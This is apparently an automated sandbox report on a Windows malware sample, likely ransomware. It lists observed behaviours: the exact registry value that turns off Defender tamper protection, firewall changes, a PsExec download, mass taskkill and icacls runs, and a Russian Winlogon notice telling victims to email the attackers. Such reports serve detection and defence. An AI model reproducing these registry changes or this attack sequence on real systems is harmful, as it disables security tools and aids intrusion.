34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89

Resubmissions

29-10-2021 09:15

211029-k7w6esdad6 10

24-08-2021 15:41

210824-hbt188jvma 10

Analysis

max time kernel
151s
max time network
139s
platform
windows10_x64
resource
win10v20210410
submitted
24-08-2021 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Size

366KB
MD5

a24e438b9535cfb06f66dbd5b11a7680
SHA1

f998c708668743677064db9307cf274c17dd9a5a
SHA256

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89
SHA512

b65c5fac207297fe0219f03779729789de443880b1d71f099ec29a17183f37a1d9d8f1f2d4484f5fc95fa647562fd565e20a1f4a81b61d89e078a8405f41c5fa

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 25 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	25	http://live.sysinternals.com/PsExec.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2700	icacls.exe
1064	icacls.exe
2904	icacls.exe
1476	icacls.exe
3976	icacls.exe
64	icacls.exe
1172	icacls.exe
192	icacls.exe
3752	icacls.exe
3936	icacls.exe
4056	icacls.exe
2700	icacls.exe
3764	icacls.exe
3220	icacls.exe
3220	icacls.exe
1996	icacls.exe
2300	icacls.exe
2732	icacls.exe
2552	icacls.exe
3456	icacls.exe
2728	icacls.exe
1508	icacls.exe
580	icacls.exe
3408	icacls.exe
3484	icacls.exe
2424	icacls.exe
192	icacls.exe
3484	icacls.exe
1164	icacls.exe
2148	icacls.exe
3996	icacls.exe
2208	icacls.exe
196	icacls.exe
1240	icacls.exe
3456	icacls.exe
200	icacls.exe
3220	icacls.exe
1404	icacls.exe
228	icacls.exe
1308	icacls.exe
2100	icacls.exe
1732	icacls.exe
3432	icacls.exe
1844	icacls.exe
3600	icacls.exe
3756	icacls.exe
2012	icacls.exe
2368	icacls.exe
4052	icacls.exe
348	icacls.exe
4076	icacls.exe
2728	icacls.exe
3956	icacls.exe
3636	icacls.exe
1600	icacls.exe
3400	icacls.exe
3656	icacls.exe
636	icacls.exe
3756	icacls.exe
3832	icacls.exe
348	icacls.exe
3976	icacls.exe
3728	icacls.exe
200	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
File opened (read-only)	\??\G:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\H:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\V:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\B:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\T:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\I:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\A:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\E:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\R:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\L:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\O:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\P:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\F:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\K:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Z:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Q:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\W:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\U:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\M:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\X:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\N:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Y:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\S:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\J:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 icanhazip.com

flow	ioc
20	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2108	taskkill.exe
196	taskkill.exe
3436	taskkill.exe
2668	taskkill.exe
3968	taskkill.exe
932	taskkill.exe
3432	taskkill.exe
1996	taskkill.exe
3788	taskkill.exe
804	taskkill.exe
2904	taskkill.exe
2736	taskkill.exe
3768	taskkill.exe
3776	taskkill.exe
2180	taskkill.exe
3152	taskkill.exe
3628	taskkill.exe
2496	taskkill.exe
2736	taskkill.exe
932	taskkill.exe
2012	taskkill.exe
744	taskkill.exe
3024	taskkill.exe
392	taskkill.exe
3348	taskkill.exe
3960	taskkill.exe
3984	taskkill.exe
1476	taskkill.exe
3940	taskkill.exe
3140	taskkill.exe
2620	taskkill.exe
3220	taskkill.exe
1288	taskkill.exe
3428	taskkill.exe
576	taskkill.exe
188	taskkill.exe
1568	taskkill.exe
3300	taskkill.exe
3152	taskkill.exe
2368	taskkill.exe
4056	taskkill.exe
3124	taskkill.exe
1168	taskkill.exe
4080	taskkill.exe
4020	taskkill.exe
2692	taskkill.exe
2084	taskkill.exe
2728	taskkill.exe
2692	taskkill.exe
2424	taskkill.exe
3984	taskkill.exe
384	taskkill.exe
2676	taskkill.exe
992	taskkill.exe
1508	taskkill.exe
2632	taskkill.exe
1172	taskkill.exe
3016	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

412 reg.exe

pid	process
412	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

pid	process
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exenetsh.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	2084	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	188	netsh.exe
Token: SeDebugPrivilege	3152	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	1568	Conhost.exe
Token: SeDebugPrivilege	3016	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	3628	taskkill.exe
Token: SeDebugPrivilege	4056	Conhost.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	2180	taskkill.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	3348	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	3776	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	196	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	384	taskkill.exe
Token: SeDebugPrivilege	804	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	3960	taskkill.exe
Token: SeDebugPrivilege	392	taskkill.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	1168	Conhost.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeDebugPrivilege	4080	taskkill.exe
Token: SeDebugPrivilege	3432	taskkill.exe
Token: SeDebugPrivilege	2728	Conhost.exe
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	2692	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	4020	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	3152	taskkill.exe
Token: SeDebugPrivilege	3428	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	744	taskkill.exe
Token: SeDebugPrivilege	2692	taskkill.exe
Token: SeDebugPrivilege	3436	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	3604	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	pid	process	target process
PID 2256 wrote to memory of 968	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2256 wrote to memory of 968	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2256 wrote to memory of 968	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2256 wrote to memory of 2676	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2256 wrote to memory of 2676	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2256 wrote to memory of 2676	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2256 wrote to memory of 2084	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2084	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2084	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 1396	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2256 wrote to memory of 1396	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2256 wrote to memory of 1396	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2256 wrote to memory of 412	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 2256 wrote to memory of 412	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 2256 wrote to memory of 412	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 2256 wrote to memory of 2700	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 2256 wrote to memory of 2700	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 2256 wrote to memory of 2700	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 2256 wrote to memory of 2032	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 2032	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 2032	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 1768	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 1768	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 1768	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 4080	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 4080	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 4080	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3752	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2256 wrote to memory of 3752	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2256 wrote to memory of 3752	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2256 wrote to memory of 1308	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 1308	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 1308	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 3960	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3960	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3960	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2000	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 2000	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 2000	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 3776	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3776	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3776	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2932	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 2932	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 2932	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2256 wrote to memory of 932	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 932	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 932	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2424	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2424	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 2424	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 188	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2256 wrote to memory of 188	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2256 wrote to memory of 188	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2256 wrote to memory of 3152	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3152	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3152	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3768	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3768	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 3768	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2256 wrote to memory of 1568	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2256 wrote to memory of 1568	2256	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
